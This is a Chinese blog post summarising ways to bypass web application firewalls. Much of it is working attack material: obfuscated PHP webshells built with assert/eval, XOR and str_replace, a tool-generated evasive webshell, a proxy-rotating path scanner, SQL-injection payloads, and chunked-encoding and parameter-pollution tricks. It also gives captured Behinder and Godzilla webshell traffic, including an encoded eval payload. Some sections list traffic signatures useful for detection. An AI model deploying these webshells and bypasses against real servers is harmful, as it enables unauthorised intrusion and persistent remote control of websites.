WAF 绕过总结【万字总结】

于 2024-09-05 00:00:00 发布
阅读量1.1k 收藏 11
点赞数 29
分类专栏: 网络空间安全 文章标签: 安全架构 安全性测试 安全威胁分析 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/141885992
版权

文章目录

  1. 代理扫描

    1. 购买代理

      1. 在快代理中购买代理(https://www.kuaidaili.com/)

      2. 购买,记住这几个信息

        1. image

    2. 直接使用代理

      1. 以awvs为例

        1. image

    3. 配置proxifier

      1. image

      2. 选择需要代理的应用程序

        1. image
        2. image
        3. image

  2. 代理脚本示例

    1.  import requests
 import time

 headers={
     'Connection': 'keep-alive',
     'Cache-Control': 'max-age=0',
     'Upgrade-Insecure-Requests': '1',
     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',
     'Sec-Fetch-Dest': 'document',
     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
     'Sec-Fetch-Site': 'none',
     'Sec-Fetch-Mode': 'navigate',
     'Sec-Fetch-User': '?1',
     'Accept-Encoding': 'gzip, deflate, br',
     'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
    'Cookie': 'bdshare_firstime=1581597934650; PHPSESSID=ncsajdvh39qse0qlsgqokshuc4; yx_auth=dc4fq8FAEkyiAUZ54b5zl9GGStCxXoRb1TFaAaozygMiSc5uZYHjR3gCQm%2BtKNz3bcjbTi8BRgcd%2F7LvR0lHN1j319CI6x29Z2QDI38',
 }

 for paths in open('php_b.txt',encoding='utf-8'):
     url='http://www.testxiaodi.fun/'
     paths=paths.replace('\n','')
     urls=url+paths
     proxy = {
         'http': 'tps686.kdlapi.com:15818',
     }
     try:
         code=requests.get(urls,headers=headers,proxies=proxy).status_code
         #req=requests.get(urls, headers=headers, proxies=proxy)
         #print(urls)
         #print(req.text)
         #time.sleep()
         print(urls+'|'+str(code))
         if code==200 or code==403:
             print(urls+'|'+str(code))
     except Exception as err:
         print('connecting error')
         time.sleep(3)

  3. 安全狗绕过

    1. useragent绕过

      1. 概念
        1. 安全狗设置了usergent的白名单是为了方便搜索引擎的爬取,但是这个操作就会导致非法ip从这里绕过,我们只需要将usergent换成百度等搜索引擎的useragent即可

  4. 传参传入

    1. 前言

      1. 变量覆盖就是通过变量将常量覆盖成变量的一部分

    2. 复现

      1. 假如我们可以上传以下的木马

        1.  <?php
 $a=$_GET['a'];
 $aa=$a.'ert';
 $aa(base64_decode($_POST['x']));
 ?>

      2. 传入payload

        1.  https://43.139.186.80/1.php?a=ass
 POST:x=cGhwaW5mbygpOw==

        2. image

        3. 原理

          1. a 是变量,可以外界传入,而后面的 a是变量,可以外界传入,而后面的 a是变量,可以外界传入,而后面的aa是 a . ′ e r t ′ ; 传来的,所以我们控制变量 a.'ert';传来的,所以我们控制变量 a.ert;传来的,所以我们控制变量a可以控制$aa的值为assert

  5. 变量覆盖

    1. 代码示例

      1. 假如我们可以传入一个木马

        1.  <?php
 $a='b';
 $b='assert';
 $$a(base64_decode($_POST['x']));
 ?>

      2. 传入payload

        1.  http://43.139.186.80/1.php
 POST:x=cGhwaW5mbygpOw==

      3. image

      4. 就是将 a 变量覆盖为 a变量覆盖为 a变量覆盖为b变量

  6. 请求方式绕过

    1. 前言

      1. 有些waf只会针对url进行过滤,并不会过滤数据内容,所以只需要改成post提交即可或者以表单形式进行提交来绕过
      2. image

  7. 分块传输绕过

    1. 原理

      1. 给服务器发送payload数据包,使得waf无法识别出payload,当apache,tomcat等web容器能正常解析其内容。如图一所示
      2. 1546517507_5c2dfc03a7bd0

    2. 插件安装

      1. 下载地址:https://github.com/c0ny1/chunked-coding-converter/releases
      2. 直接在扩展模块中导入jar包即可

    3. 复现

      1. 靶场:sqliab

      2. 构造好语句之后直接在数据包中使用插件即可

        1. image

  8. 参数污染/无效参数/相同参数

    1. 参数污染

      1. 介绍
        1. 比如一个页面中要求传入一个x参数,但是我传入多个参数会不会使用了别的另一个参数的值而绕过waf呢
      2. 复现

        1. 靶场源码:<?php echo $_GET['x'];?>

        2. 可以看到他是显示后面的123的,如果waf只对前面那个进行过滤就会导致绕过

          1. image

    2. 无效参数

      1. 介绍
        1. waf为了节约性能,当其数据达到一定的长度的时候就不会再进行检测了,这样就可以通过添加大量的无效参数来绕过
      2. 复现
        1. 靶场:sqliab
        2. image

    3. 相同参数

      1. 介绍
        1. 利用数据包中其他的变量参数作为php后门的名字,有些waf可能会认为其是变量来进行绕过
      2. 复现
        1. 靶场:pikachu
        2. image

  9. like,relike,regexp,replace函数绕过

    1. like

      1. 前言
        1. sql语法的 模糊匹配需要在where字句
        2. % 代表零个或任意字符
        3. _ 代表1个字符
      2. 复现

        1. 靶场:sqliab

        2. http://127.0.0.1/sqliab/Less-2/?id=1 like 2错误回显

          1. image

        3. http://127.0.0.1/sqliab/Less-2/?id=1 like 1回显正常

          1. image

        4. like 's%'判断第一个字符是否为s

          1. http://127.0.0.1/sqliab/Less-2/?id=-1 union select 1,database() like 's%',3
          2. image

        5. 测试前两个字符是否是se

          1. http://127.0.0.1/sqliab/Less-2/?id=-1 union select 1,database() like 'se%',3
          2. image

        6. like ‘%sq%’ 判断是否包含se两个字符串

          1. http://127.0.0.1/sqliab/Less-2/?id=-1 union select 1,database() like '%se%',3

        7. like '_____'判断是否为5个字符

          1. http://127.0.0.1/sqliab/Less-2/?id=-1 union select 1,database() like '________',3

        8. like 's____' 判断第一个字符是否为s

          1. http://127.0.0.1/sqliab/Less-2/?id=-1 union select 1,database() like 's_______',3
          2. image

    2. replace函数绕过

      1. 复现

        1. 源码

          1.  <?php
 $x = eval($_GET['s']);
 echo "<pre>$x</pre>";
 ?>

        2. 这是个命令执行页面,假设waf对phpinfo命令进行过滤

        3. 输入payloadhttp://127.0.0.1/3.php?s=$y=str_replace('x','','phxpxixnfxo()');assert($y);

          1. 通过replace函数将x字母替换为空从而构造出phpinfo
          2. image

    PHP加密绕过

    1. 前言

      1. 通过底层逻辑在不影响php代码解析运行的1情况下来对php文件进行加密

    2. 复现

      1. 加密网站:免费在线PHP源码加密工具-保护PHP代码安全 (phpcodejm.com)

      2. 原木马文件内容:

        <?php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x'])); 
?>

      3. 加密后的文件内容

        1. image

      4. 上传入目标网站,发现可以正常解析运行

        1. image

  10. 异或绕过

    1. 前言

      1. php解析器可以解析特殊的异或操作,例如$a=('!'^'@');可解析为a,然后这样构造后门即可绕过<?php $a=('!'^'@').'ssert';$a($_POST[x]);?>

    2. 异或生成器

      1. 脚本1
        1.  <?php

 $myfile = fopen("or_rce.txt", "w");
 $contents="";
 for ($i=0; $i < 256; $i++) { 
 for ($j=0; $j <256 ; $j++) { 

 if($i<16){
 $hex_i='0'.dechex($i);
 }
 else{
 $hex_i=dechex($i);
 }
 if($j<16){
 $hex_j='0'.dechex($j);
 }
 else{
 $hex_j=dechex($j);
 }
 $preg = '/[0-9a-z]/i';    // 根据题目给的正则表达式修改即可
 if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
 echo "";
 }

 else{
 $a='%'.$hex_i;
 $b='%'.$hex_j;
 $c=(urldecode($a)|urldecode($b));
 if (ord($c)>=32&ord($c)<=126) {
 $contents=$contents.$c." ".$a." ".$b."\n";
 }
 }

 }
 }
 fwrite($myfile,$contents);
 fclose($myfile);

      2. 脚本2:

        1.  全部生成:
 import string
 from urllib.parse import quote

 keys = list(range(65)) + list(range(91, 97)) + list(range(123, 127))
 results = []
 for i in keys:
     for j in keys:
         asscii_number = i ^ j
         if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
             if i < 32 and j < 32:
                 temp = (
                 f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                 results.append(temp)
             elif i < 32 and j >= 32:
                 temp = (
                 f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                 results.append(temp)
             elif i >= 32 and j < 32:
                 temp = (
                 f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                 results.append(temp)
             else:
                 temp = (
                 f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                 results.append(temp)

 results.sort(key=lambda x: x[1], reverse=False)
 for low_case in string.ascii_lowercase:
     for result in results:
         if low_case in result:
             print(result[0])

 for upper_case in string.ascii_uppercase:
     for result in results:
         if upper_case in result:
             print(result[0])
        2. image

      3. 脚本3

        1.  <?php
 $fuhao = "!@#$%^&*()_+=<>?:,.{}[]\\|/";
 $zimu = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";
 $strlen_fuhao = strlen($fuhao);
 $strlen_zimu = strlen($zimu);
 for ($i = 0; $i < $strlen_fuhao; $i++) {
     for ($j = 0; $j < $strlen_zimu; $j++) {
         echo $fuhao[$i] . "^" . $zimu[$j] . " -> " . ($fuhao[$i] ^ $zimu[$j]) . "<br>";
     }
 }
 ?>
        2. image

    3. 复现

  11. 利用脚本生成免杀绕过

    1. vennom工具

      1. 工具链接:webshell-venom-master.zip

        1. image

      2. 按照使用说明即可,以下是工具生成的木马示例

        1.  <?php
 class HXIY{
     function __destruct(){
         $FTVN='SxvesA'^"\x32\xb\x5\x0\x1\x35";
         return @$FTVN("$this->CEQB");
     }
 }
 $hxiy=new HXIY();
 @$hxiy->CEQB=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
 ?>

 payload:
 http://43.139.186.80/1.php
 mr6=phpinfo();
        2. image

  12. webshell工具绕过

    1. 菜刀

      1. 数据包
        1. ·image
      2. 流量特征
        1. usergent头为百度爬虫
        2. 存在eval,base64等字符
        3. payload存在固定为QGluaV9zZXQ开头,进行base64解码后可看到代码@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);这段意思是首先关闭报错和magic_quotes,接下来去获取主机的信息。

  13. 冰蝎

    1. image

    2. 数据包

      1. 使用wirshark捉包,发现每次交互有三个数据包

        1. image

      2. 第一个发送数据包(不部分)

        1.  POST /1.php HTTP/1.1
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Content-type: application/x-www-form-urlencoded
 Referer: http://43.139.186.80/1.php
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
 Content-Length: 309328
 Host: 43.139.186.80
 Connection: Keep-Alive
 Accept-Encoding: gzip
 Cookie: PHPSESSID=dfln37esbsv9kfpdm7ggtov820

 OT8AQUBWFDoQUBRWQEELC1MdVRoJNGwNB1QAXEAdRSZbWxFWXE1LMRtFAQMSQQcdQBoNR19VXUUBXQVLQVAWWGFhIx4KHk9ebz9pMz8/BBBaVhFaXVdGAgdBN1hUUDERRh1BQEZLT2hoTmkzEhVCRRBGVBMPGQ8GDVsSERVAFgMZDUIfEh4BBwkaS3B1ey03cRJJExZKEhdLDmkzEhVCRRBGVRMPGQ8GDVsSERVSAA4TGUUUR00ASFoaS3B1ey03cRJJExZKV0xZOG4ZEhVCDFIVTRdBCUZYXxVASkZHS0VPOG8TEhlGRUIVREtXQRcXWhVBQAICa29CFUQZTxUHCUdQRUg/M0ZFQhVEGRIVEABAQBddElAFCgxDTB5VVwlCGBVCRkZfS11NGi1+fHowIBMZRRdBTRRMWThuGRIVQhg5Pxg+OF8TCwFBDVZcFQUAQFIHWGFNFE1GRhBLGzhoHjk/RRMSGUIWUhVZGVtWDQtCHUJUUFJBSUISEU1UGFpKG3wifX1rI0JOFUBKAxxZaD4VRRMSHRVUQghEUFFaDBMcEhBHVBReQk4VQ15QXk1KfXIrfGB8QUlCERdNQBxZaD4VRRMSUABFShEXCBIIX0UQRhFBGxkdaGgVRBkSFUJFFEcAR0dLCEVGRlUCPz9CRRQVGBNXVRUAQk5pMxIVQkUUFUUTQFwSEBBbRFBRWgwTHBIQR1QUXkJOFUNeUF5NSn1yK3xgfEFJQhEXTUAcWWg+FUUTEkRrbx84bl9HWwERXVoLE1ZcCiELR0wdVlwQTDk/Hj44GUZFQhECUF5QEUUJFQRBQFgfOgZcAl8aRgEEWlEMQRodAgwQHEgZU0cQBE0daDkSGUZFQhVEGRUbRUk5P0UTEhlGRUIVQxccEm9vFBVFExsQXWhoFUQZElMNF1FUBlsSEUIDC1kBShJUEUUQUwxfVxBGHm8/RBkSFUJFFBVNWkFmAgwQHUYdVlwQShBTDF9XG09MQgpEXVdZNhdRUE0RFl0PF00RAlBeUEBMFA9FRlxVDwsJHUYdVlwQShBTDF9XG09ebz9EGRIVH2g+FUUTEksDERdHChlAWAYMRh1BV1tLT15vPxk0ODhoA0FbBkdbVghFD1QNVxoRDwpQUEkTFkkHEQoVWRkQG0BJFBENUkFRRlhCF0YVEhEACVtWDnpcXQMdQghEGxAZQkFWWQpQWWoPHwcVWRkQF05FEFYKXUZcCBFCCEQbEBlCQVddBEFBXBJFXxVGGx4VRgtRQhVSRlFGWEIXRhUSEQEXUVQRVmZQCwAxQQVUQhVfRRYXSRMWWAUGB0YXbVtYBzZAVAhDEgRGR0AZRB1fWgYMUkwxWl9cNREDWBQZDxVARx04b0g/

      3. 第一个返回包(部分)

        1.  HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 01 Sep 2024 03:03:24 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Vary: Accept-Encoding
 Content-Encoding: gzip

 TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEdjBhZaUFQgEThmLQ97XhoLZGFVWn56LB8DbRRVe18NDGBeN3F8bFMLMmFUUH52KBZtbSsDZm5fDgNiPkloYjMMe1wvfVNSIFA2XilOVgVbIXl9FX1jCSBQNm0UT39gVzBWTyNjZ21WXCtcE1BRcjQcVmYsBXtVMBUtYwx0f3M3XH1cElpWcQoSOGYtD3tZEi1WfQlSZAlSEjtfKnJ8ZihceH0WWlBUIBE4Zi0Pe14aFXpxVVp+eiwfA20UVXtfDQx9XBJaUH4gHwZwVU9ocg4IVWIzWHtTCQw2YzZLfwVTIXl9AX1nQyRWNmMqe1YFWyBWBgF9YH5fVjZgIQBiZisWfVsnX1FUVgwtXC50Z08KVWB9DkRiai8WK1s2DFFyNwx7XC9SYAseUDVZAHZ/cisfZ18wWlRqHlIrWFFRUGI3DHtcL35QbgESNWMAdlNZEjxgWwpafnosHwNtFFV7Xw0MYGMgCmJqLxYrWBxRUQYwK1YHN0NoVAoJOHYtD3teUxRlbQl8Y0MkVjYFKU5XYFshZW0JfWR+X1E2BTZPf2BXN2RhVVp+eiwSOG0uTXtfDQxiYg4GZXwREjRhVFB+dihVUW0nX3tTCQw1WFVKUQQSN2RhVVpUah5SK1hRUVBiNwx7XC9+UFU8UzVZDHNWYiQ9em0kWn56LB8DbRRVe18NDGBtFVliai8WK1gcUVEGMCtWBzdDaFQKCTh2LQ97XlMUZW0JfGNDJFY2BSlOV2BbIWVtCX1kfl9RNgU2T39gVydkYVVafnosEjhtLk17Xw0MYmIOB1Z8HlAvcVRQfnYoVVFtJ197UwkMNVhVSlEEEjdkYVVaVGoeUitYUVFQYjcMe1wvfWdDMFY7YAx7YmYrFn1bK0NXVDMMLVwud1deJx99XBJaUH4gHwZwVU9ocg4IVWIzWHtTCQw2YhR7V2BXIXl9AWNjQyRTNmMqe1dgU1NWBgF8V1RfUDZtBwBiZisWfVsnX1FUVgwtXC5vU2EOPGBxJ2Viai8WK1s2DFFyNwx7XC9SUG4eHzVZIQBiZihceH0WWlBUIBE4Zi0Pe15XIGVhJ35QbgESO1kACmJmKxZ9WytDV1QzDC1cLndkcydVfVwSWlB+IB8GcFVPaHIOCFViM1h7UwkMNmIUe1dgVyF5fQFjY0MkUDYFKntXYFMwVgYNY2B+Xh02WSEAYmYrFn1bJ19RVFYMLVwub1NhDjxgcSdlYmovFitbNgxRcjcMe1wvUlBuHh81WSEAYmYoXHh9FlpQVCAROGYtD3tYJD16YhFSZX4CVDtgDGpWcignZGFVWn56LB8DbRRVe18NDGAEN3V/
    3. 流量特征
      1. 具有默认的aes加密秘钥"e45e329feb5d925b",默认密码为rebeyond
      2. 同一个ip的useragent不断的变化
      3. 避免频繁握手,会有Connection:Keep-Alive字段
      4. 固定的accept字段Accept: text/html,image/gif, image/jpeg, *; q=.2, */*; q=.2

  14. 哥斯拉

    1. 数据包

      1. 直接捉取刚连接上的数据包

        1. image

      2. 发送包

        1.  POST /2.php HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
 Cookie: PHPSESSID=fe8kn3pu1ul8jdvi86f9m2okb6;
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Host: 43.139.186.80
 Connection: keep-alive
 Content-type: application/x-www-form-urlencoded
 Content-Length: 1263

 pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=DlMRWA1cL1gOVDc2MjRhRwZFEQ%3D%3D

      3. 返回包

        1.  HTTP/1.1 200 OK
 Server: nginx
 Date: Sun, 01 Sep 2024 05:24:51 GMT
 Content-Type: text/html; charset=UTF-8
 Transfer-Encoding: chunked
 Connection: keep-alive
 Vary: Accept-Encoding
 Set-Cookie: PHPSESSID=fe8kn3pu1ul8jdvi86f9m2okb6; path=/
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache

 72a9c691ccdaab98fL1tMGI4YTljMv79NDQm7r9PZzBiOA==b4c4e1f6ddd2a488
    2. 流量特征
      1. 避免握手频繁会有Connection: keep-alive字段
      2. 会有一些关键代码eval
      3. 发送包中的cookie以分号结尾
      4. 默认accept特征为text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
      5. 响应包中的结构为md5前十六位+base64+md5后十六位,所以中间可能存在等号

CongSec
关注
  • 29
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1043
万字渗透测试入门知识点,自学查漏补缺
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
sql注入大总结万字详解】
2301_80064376的博客
08-10 2896
SQL注入是利用程序对用户输入参数的验证不严格,在用户输入的数据中注入SQL语句代码,使其被数据库服务器误认为正常的SQL语句而执行,从而达到欺骗数据库操作的效果。
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
2401_84264536的博客
04-27 2202
最后的or '1闭合查询语句的最后的单引号,或者:id=1’ union select 1,2,'3使用like 、rlike 、regexp 或者 使用< 或者 >(1)使用注释符绕过常用注释符://,-- , /**/, #, --+, – -, ;,%00,–a用法:U// NION // SE// LECT //user,pwd from user(2)使用大小写绕过id=-1’UnIoN/**/SeLeCT(3)内联注释绕过id=-1’/!UnIoN/ SeLeCT 1,2,concat(/!ta
万字总结护网知识
Hacker_j1的博客
08-02 626
HIDS:对全网信息捕捉微步:攻击发现,会显示攻击者画像 方便溯源分析威胁情报发现,发现恶意IP亚信:ei拦截的恶意文件会自动在an中运行检测生成报告ddei邮件网关,过滤垃圾邮件,对恶意文件隔离ddan沙箱(=微步云沙箱):检测恶意文件,分析恶意样本,收集攻击信息,生成行为报告。
SQL注入详解(万字文章详解)
追光者的博客
03-12 8452
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
SQL注入万字详解,基于sqli-labs(手注+sqlmap)
2401_82985722的博客
07-21 935
SQL 是 Structured Query Language 的缩写,中文译为“结构化查询语言”。SQL 是用于访问和处理数据库的标准的计算机语言。SQL 指结构化查询语言SQL 使我们有能力访问数据库SQL 是一种 ANSI 的标准计算机语言Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。在SQL数据库中,每条语句是以;
网络安全(黑客)万字自学笔记
2301_77732591的博客
07-17 4065
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!
CTFshow_XSS与xss-labs全关卡万字通关笔记
dasdasdasvsdV的博客
07-31 289
反射型非持久型,常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个GET请求来访问带有恶意代码的链接。造成反射型XSS主要是GET类型。存储型持久型,常见的就是在博客留言板、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端(数据库、内存、文件系统等),每次访问都会触发恶意代码。DOM型DOM型XSS其实是一种特殊类型的反射型XSS,也被称作本地跨站,它是基于DOM文档对象模型的一种漏洞。
万字2024红队信息打点之被动信息收集(全面篇)
穹渊安全的博客
07-09 1549
3000 test #forks数量大于1000小于3000的搜索关键字 size:>=5000 test #指定仓库大于5000k(5M)的搜索关键字 pushed:>2019-02-12 test #发布时间大于2019-02-12的搜索关键字 created:>2019-02-12 test #创建时间大于2019-02-12的搜索关键字 user:test #用户名搜素。,但是在一旦在代码发布的时候,在配置不当的情况下,可能会将“.git”文件直接部署到线上环境,,就很可能将源代码泄露出去。
长亭waf绕过1.pdf
07-09
长亭waf绕过1
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
架构-27】安全架构设计-2
qq_45611002的博客
08-24 1044
安全架构架构面向安全性方向上的一种细分,通常的可组成三道安全防线。
vulnhub靶机 DC-9(渗透测试详解)
2301_78721909的博客
08-14 609
vulnhub靶机 DC-9(渗透测试详解)
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1132
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1483
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-04 510
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全服务基础Windows--第12节-域与活动目录
m0_65771743的博客
09-03 1017
域中的计算机可以共享资源,例如⽂件系统和打印机,⽤户只需在域中进⾏⼀次登录(单点登录),就可以访问其有权限的所有资源。我们在服务器上通过查找⼀个对象可以查到的所有关联信息总和,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、联系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值